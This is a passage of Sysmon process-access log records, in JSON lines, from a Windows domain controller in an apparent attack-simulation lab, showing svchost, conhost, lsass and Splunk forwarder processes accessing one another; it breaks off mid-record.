{"EventTime":"2020-08-01 07:55:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3890,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:45.302\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:45.302","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3891,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:45.302\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:45.302","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3892,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:45.302\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:45.302","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3893,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:45.302\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:45.302","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3894,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:45.302\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:45.302","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3895,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:45.302\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:45.302","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3896,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:45.302\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-2001-5F25-0000-0010C9D80500}\r\nTargetProcessId: 4596\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:45.302","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-2001-5F25-0000-0010C9D80500}","TargetProcessId":"4596","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3897,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:45.443\r\nSourceProcessGUID: {41C8662E-2001-5F25-0000-0010C9D80500}\r\nSourceProcessId: 4596\r\nSourceThreadId: 2844\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+577205|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+576d36|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+56c09|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+572d6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+8fe2c4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:45.443","SourceProcessGUID":"{41C8662E-2001-5F25-0000-0010C9D80500}","SourceProcessId":"4596","SourceThreadId":"2844","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+577205|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+576d36|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+56c09|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+572d6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+8fe2c4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3898,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:45.459\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 1104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-2001-5F25-0000-0010C9D80500}\r\nTargetProcessId: 4596\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 